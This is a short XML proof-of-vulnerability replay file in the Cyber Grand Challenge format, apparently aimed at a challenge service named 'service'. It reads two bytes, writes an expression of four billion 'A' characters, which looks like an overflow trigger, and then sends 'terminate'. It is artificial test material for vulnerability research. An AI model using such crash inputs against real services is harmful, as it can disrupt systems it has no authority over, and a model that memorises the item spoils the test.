<?xml version="1.0" standalone="no" ?>
<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">
<pov>
<cbid>service</cbid>
<replay>
    <read><length>2</length></read>
    <write><data>"A" * 4294967295\n</data></write>
    <read><length>2</length></read>
    <write><data>terminate\n</data></write>
</replay>
</pov>
